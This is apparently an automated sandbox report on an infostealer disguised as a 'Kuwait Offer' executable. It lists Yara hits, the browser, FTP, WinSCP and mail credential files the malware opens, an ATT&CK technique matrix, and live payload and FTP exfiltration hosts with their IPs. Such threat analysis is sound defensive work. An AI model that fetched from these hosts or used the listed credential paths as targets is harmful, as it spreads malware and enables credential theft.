                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2575392389.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7232, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7232, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2575392389.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7232, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    1
                    Registry Run Keys / Startup Folder
                    311
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    311
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Software Packing
                    NTDS13
                    Virtualization/Sandbox Evasion
                    Distributed Component Object Model1
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Process Discovery
                    SSHKeylogging13
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528672 Sample: Kuwait Offer48783929281-BZ2.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 30 ftp.alternatifplastik.com 2->30 32 wymascensores.com 2->32 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 12 other signatures 2->52 7 Kuwait Offer48783929281-BZ2.exe 16 4 2->7         started        12 Hxfzsthbd.exe 14 2 2->12         started        14 Hxfzsthbd.exe 2 2->14         started        signatures3 process4 dnsIp5 34 wymascensores.com 67.212.175.162, 443, 49717, 49800 SINGLEHOP-LLCUS United States 7->34 24 C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, PE32 7->24 dropped 26 C:\Users\...\Hxfzsthbd.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Allocates memory in foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        60 Multi AV Scanner detection for dropped file 12->60 62 Machine Learning detection for dropped file 12->62 64 Injects a PE file into a foreign processes 12->64 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49742, 49758 ALASTYRTR Turkey 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Kuwait Offer48783929281-BZ2.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
                    Kuwait Offer48783929281-BZ2.exe28%VirustotalBrowse
                    Kuwait Offer48783929281-BZ2.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Hxfzsthbd.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Hxfzsthbd.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\AppData\Roaming\Hxfzsthbd.exe28%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    wymascensores.com11%VirustotalBrowse
                    ftp.alternatifplastik.com3%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://mathparser.org0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                    https://wymascensores.com/dfsd/Wulwtq.mp310NWLLwEk5H11%VirustotalBrowse
                    https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                    https://wymascensores.com/dfsd/Wulwtq.mp311%VirustotalBrowse
                    https://mathparser.org/order-commercial-license0%VirustotalBrowse
                    https://payhip.com/infima0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                    https://payhip.com/infima)0%VirustotalBrowse
                    http://ftp.alternatifplastik.com3%VirustotalBrowse
                    https://wymascensores.com6%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    wymascensores.com
                    67.212.175.162
                    truefalseunknown
                    ftp.alternatifplastik.com
                    5.2.84.236
                    truetrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://wymascensores.com/dfsd/Wulwtq.mp3trueunknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://mathparser.orgHxfzsthbd.exe.0.drfalseunknown
                    https://mathparser.org/order-commercial-licenseHxfzsthbd.exe.0.drfalseunknown
                    https://github.com/mgravell/protobuf-netiKuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://stackoverflow.com/q/14436606/23354Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://account.dyn.com/Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/mgravell/protobuf-netJKuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://stackoverflow.com/q/11564914/23354;Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://stackoverflow.com/q/2152978/23354Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://wymascensores.com/dfsd/Wulwtq.mp310NWLLwEk5HKuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.drtrueunknown
                    https://github.com/mgravell/protobuf-netKuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://payhip.com/infimaHxfzsthbd.exe.0.drfalseunknown
                    https://wymascensores.comKuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002A9C000.00000004.00000800.00020000.00000000.sdmptrueunknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.0000000003061000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://payhip.com/infima)Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.drfalseunknown
                    http://ftp.alternatifplastik.comInstallUtil.exe, 00000002.00000002.1480659431.00000000025FC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    67.212.175.162
                    wymascensores.comUnited States
                    32475SINGLEHOP-LLCUSfalse
                    5.2.84.236
                    ftp.alternatifplastik.comTurkey
                    3188ALASTYRTRtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1528672
                    Start date and time:2024-10-08 08:55:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Kuwait Offer48783929281-BZ2.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                    EGA Information:
                    • Successful, ratio: 83.3%
